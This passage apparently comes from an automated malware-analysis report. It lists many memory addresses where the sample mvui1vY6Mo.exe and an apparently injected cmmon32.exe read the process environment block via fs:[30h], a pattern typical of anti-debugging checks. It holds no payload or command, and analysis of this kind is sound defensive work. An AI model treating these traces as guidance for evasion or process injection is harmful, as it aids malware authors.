          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186002D mov eax, dword ptr fs:[00000030h] 2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186002D mov eax, dword ptr fs:[00000030h] 2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186002D mov eax, dword ptr fs:[00000030h] 2_2_0186002D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184B02A mov eax, dword ptr fs:[00000030h] 2_2_0184B02A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184B02A mov eax, dword ptr fs:[00000030h] 2_2_0184B02A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184B02A mov eax, dword ptr fs:[00000030h] 2_2_0184B02A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184B02A mov eax, dword ptr fs:[00000030h] 2_2_0184B02A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186A44B mov eax, dword ptr fs:[00000030h] 2_2_0186A44B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01850050 mov eax, dword ptr fs:[00000030h] 2_2_01850050
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01850050 mov eax, dword ptr fs:[00000030h] 2_2_01850050
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CC450 mov eax, dword ptr fs:[00000030h] 2_2_018CC450
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CC450 mov eax, dword ptr fs:[00000030h] 2_2_018CC450
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01901074 mov eax, dword ptr fs:[00000030h] 2_2_01901074
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0185746D mov eax, dword ptr fs:[00000030h] 2_2_0185746D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F2073 mov eax, dword ptr fs:[00000030h] 2_2_018F2073
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F138A mov eax, dword ptr fs:[00000030h] 2_2_018F138A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01841B8F mov eax, dword ptr fs:[00000030h] 2_2_01841B8F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01841B8F mov eax, dword ptr fs:[00000030h] 2_2_01841B8F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018ED380 mov ecx, dword ptr fs:[00000030h] 2_2_018ED380
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01848794 mov eax, dword ptr fs:[00000030h] 2_2_01848794
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01862397 mov eax, dword ptr fs:[00000030h] 2_2_01862397
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186B390 mov eax, dword ptr fs:[00000030h] 2_2_0186B390
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B7794 mov eax, dword ptr fs:[00000030h] 2_2_018B7794
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B7794 mov eax, dword ptr fs:[00000030h] 2_2_018B7794
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B7794 mov eax, dword ptr fs:[00000030h] 2_2_018B7794
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01864BAD mov eax, dword ptr fs:[00000030h] 2_2_01864BAD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01864BAD mov eax, dword ptr fs:[00000030h] 2_2_01864BAD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01864BAD mov eax, dword ptr fs:[00000030h] 2_2_01864BAD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01905BA5 mov eax, dword ptr fs:[00000030h] 2_2_01905BA5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B53CA mov eax, dword ptr fs:[00000030h] 2_2_018B53CA
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B53CA mov eax, dword ptr fs:[00000030h] 2_2_018B53CA
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h] 2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h] 2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h] 2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h] 2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h] 2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018603E2 mov eax, dword ptr fs:[00000030h] 2_2_018603E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0185DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0185DBE9
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018737F5 mov eax, dword ptr fs:[00000030h] 2_2_018737F5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186A70E mov eax, dword ptr fs:[00000030h] 2_2_0186A70E
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186A70E mov eax, dword ptr fs:[00000030h] 2_2_0186A70E
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0185F716 mov eax, dword ptr fs:[00000030h] 2_2_0185F716
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018F131B mov eax, dword ptr fs:[00000030h] 2_2_018F131B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CFF10 mov eax, dword ptr fs:[00000030h] 2_2_018CFF10
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CFF10 mov eax, dword ptr fs:[00000030h] 2_2_018CFF10
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0190070D mov eax, dword ptr fs:[00000030h] 2_2_0190070D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0190070D mov eax, dword ptr fs:[00000030h] 2_2_0190070D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01834F2E mov eax, dword ptr fs:[00000030h] 2_2_01834F2E
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01834F2E mov eax, dword ptr fs:[00000030h] 2_2_01834F2E
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186E730 mov eax, dword ptr fs:[00000030h] 2_2_0186E730
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183DB40 mov eax, dword ptr fs:[00000030h] 2_2_0183DB40
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184EF40 mov eax, dword ptr fs:[00000030h] 2_2_0184EF40
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01908B58 mov eax, dword ptr fs:[00000030h] 2_2_01908B58
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183F358 mov eax, dword ptr fs:[00000030h] 2_2_0183F358
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0183DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0183DB60
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184FF60 mov eax, dword ptr fs:[00000030h] 2_2_0184FF60
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01908F6A mov eax, dword ptr fs:[00000030h] 2_2_01908F6A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01863B7A mov eax, dword ptr fs:[00000030h] 2_2_01863B7A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01863B7A mov eax, dword ptr fs:[00000030h] 2_2_01863B7A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018CFE87 mov eax, dword ptr fs:[00000030h] 2_2_018CFE87
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186D294 mov eax, dword ptr fs:[00000030h] 2_2_0186D294
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186D294 mov eax, dword ptr fs:[00000030h] 2_2_0186D294
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h] 2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h] 2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h] 2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h] 2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018352A5 mov eax, dword ptr fs:[00000030h] 2_2_018352A5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018B46A7 mov eax, dword ptr fs:[00000030h] 2_2_018B46A7
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0184AAB0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0184AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0184AAB0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01900EA5 mov eax, dword ptr fs:[00000030h] 2_2_01900EA5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01900EA5 mov eax, dword ptr fs:[00000030h] 2_2_01900EA5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01900EA5 mov eax, dword ptr fs:[00000030h] 2_2_01900EA5
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_0186FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0186FAB0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01878EC7 mov eax, dword ptr fs:[00000030h] 2_2_01878EC7
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01908ED6 mov eax, dword ptr fs:[00000030h] 2_2_01908ED6
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_018636CC mov eax, dword ptr fs:[00000030h] 2_2_018636CC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe Code function: 2_2_01862ACB mov eax, dword ptr fs:[00000030h] 2_2_01862ACB
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018EFEC0 mov eax, dword ptr fs:[00000030h]2_2_018EFEC0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01862AE4 mov eax, dword ptr fs:[00000030h]2_2_01862AE4
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018616E0 mov ecx, dword ptr fs:[00000030h]2_2_018616E0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018476E2 mov eax, dword ptr fs:[00000030h]2_2_018476E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183C600 mov eax, dword ptr fs:[00000030h]2_2_0183C600
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183C600 mov eax, dword ptr fs:[00000030h]2_2_0183C600
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183C600 mov eax, dword ptr fs:[00000030h]2_2_0183C600
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01868E00 mov eax, dword ptr fs:[00000030h]2_2_01868E00
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F1608 mov eax, dword ptr fs:[00000030h]2_2_018F1608
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01848A0A mov eax, dword ptr fs:[00000030h]2_2_01848A0A
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01835210 mov eax, dword ptr fs:[00000030h]2_2_01835210
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01835210 mov ecx, dword ptr fs:[00000030h]2_2_01835210
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01835210 mov eax, dword ptr fs:[00000030h]2_2_01835210
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01835210 mov eax, dword ptr fs:[00000030h]2_2_01835210
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183AA16 mov eax, dword ptr fs:[00000030h]2_2_0183AA16
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183AA16 mov eax, dword ptr fs:[00000030h]2_2_0183AA16
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01853A1C mov eax, dword ptr fs:[00000030h]2_2_01853A1C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186A61C mov eax, dword ptr fs:[00000030h]2_2_0186A61C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186A61C mov eax, dword ptr fs:[00000030h]2_2_0186A61C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183E620 mov eax, dword ptr fs:[00000030h]2_2_0183E620
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01874A2C mov eax, dword ptr fs:[00000030h]2_2_01874A2C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01874A2C mov eax, dword ptr fs:[00000030h]2_2_01874A2C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018EFE3F mov eax, dword ptr fs:[00000030h]2_2_018EFE3F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839240 mov eax, dword ptr fs:[00000030h]2_2_01839240
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839240 mov eax, dword ptr fs:[00000030h]2_2_01839240
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839240 mov eax, dword ptr fs:[00000030h]2_2_01839240
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01839240 mov eax, dword ptr fs:[00000030h]2_2_01839240
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01847E41 mov eax, dword ptr fs:[00000030h]2_2_01847E41
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FAE44 mov eax, dword ptr fs:[00000030h]2_2_018FAE44
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FAE44 mov eax, dword ptr fs:[00000030h]2_2_018FAE44
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FEA55 mov eax, dword ptr fs:[00000030h]2_2_018FEA55
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018C4257 mov eax, dword ptr fs:[00000030h]2_2_018C4257
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184766D mov eax, dword ptr fs:[00000030h]2_2_0184766D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018EB260 mov eax, dword ptr fs:[00000030h]2_2_018EB260
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018EB260 mov eax, dword ptr fs:[00000030h]2_2_018EB260
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01908A62 mov eax, dword ptr fs:[00000030h]2_2_01908A62
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0185AE73 mov eax, dword ptr fs:[00000030h]2_2_0185AE73
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0187927A mov eax, dword ptr fs:[00000030h]2_2_0187927A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484849B mov eax, dword ptr fs:[00000030h]11_2_0484849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04908CD6 mov eax, dword ptr fs:[00000030h]11_2_04908CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F14FB mov eax, dword ptr fs:[00000030h]11_2_048F14FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6CF0 mov eax, dword ptr fs:[00000030h]11_2_048B6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6CF0 mov eax, dword ptr fs:[00000030h]11_2_048B6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6CF0 mov eax, dword ptr fs:[00000030h]11_2_048B6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6C0A mov eax, dword ptr fs:[00000030h]11_2_048B6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6C0A mov eax, dword ptr fs:[00000030h]11_2_048B6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6C0A mov eax, dword ptr fs:[00000030h]11_2_048B6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6C0A mov eax, dword ptr fs:[00000030h]11_2_048B6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1C06 mov eax, dword ptr fs:[00000030h]11_2_048F1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490740D mov eax, dword ptr fs:[00000030h]11_2_0490740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490740D mov eax, dword ptr fs:[00000030h]11_2_0490740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490740D mov eax, dword ptr fs:[00000030h]11_2_0490740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486BC2C mov eax, dword ptr fs:[00000030h]11_2_0486BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A44B mov eax, dword ptr fs:[00000030h]11_2_0486A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CC450 mov eax, dword ptr fs:[00000030h]11_2_048CC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CC450 mov eax, dword ptr fs:[00000030h]11_2_048CC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485746D mov eax, dword ptr fs:[00000030h]11_2_0485746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862581 mov eax, dword ptr fs:[00000030h]11_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862581 mov eax, dword ptr fs:[00000030h]11_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862581 mov eax, dword ptr fs:[00000030h]11_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862581 mov eax, dword ptr fs:[00000030h]11_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04832D8A mov eax, dword ptr fs:[00000030h]11_2_04832D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486FD9B mov eax, dword ptr fs:[00000030h]11_2_0486FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486FD9B mov eax, dword ptr fs:[00000030h]11_2_0486FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048635A1 mov eax, dword ptr fs:[00000030h]11_2_048635A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04861DB5 mov eax, dword ptr fs:[00000030h]11_2_04861DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04861DB5 mov eax, dword ptr fs:[00000030h]11_2_04861DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04861DB5 mov eax, dword ptr fs:[00000030h]11_2_04861DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_049005AC mov eax, dword ptr fs:[00000030h]11_2_049005AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_049005AC mov eax, dword ptr fs:[00000030h]11_2_049005AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov ecx, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B6DC9 mov eax, dword ptr fs:[00000030h]11_2_048B6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484D5E0 mov eax, dword ptr fs:[00000030h]11_2_0484D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484D5E0 mov eax, dword ptr fs:[00000030h]11_2_0484D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FFDE2 mov eax, dword ptr fs:[00000030h]11_2_048FFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FFDE2 mov eax, dword ptr fs:[00000030h]11_2_048FFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FFDE2 mov eax, dword ptr fs:[00000030h]11_2_048FFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FFDE2 mov eax, dword ptr fs:[00000030h]11_2_048FFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048E8DF1 mov eax, dword ptr fs:[00000030h]11_2_048E8DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04908D34 mov eax, dword ptr fs:[00000030h]11_2_04908D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483AD30 mov eax, dword ptr fs:[00000030h]11_2_0483AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FE539 mov eax, dword ptr fs:[00000030h]11_2_048FE539
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048BA537 mov eax, dword ptr fs:[00000030h]11_2_048BA537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04864D3B mov eax, dword ptr fs:[00000030h]11_2_04864D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04864D3B mov eax, dword ptr fs:[00000030h]11_2_04864D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04864D3B mov eax, dword ptr fs:[00000030h]11_2_04864D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04873D43 mov eax, dword ptr fs:[00000030h]11_2_04873D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B3540 mov eax, dword ptr fs:[00000030h]11_2_048B3540
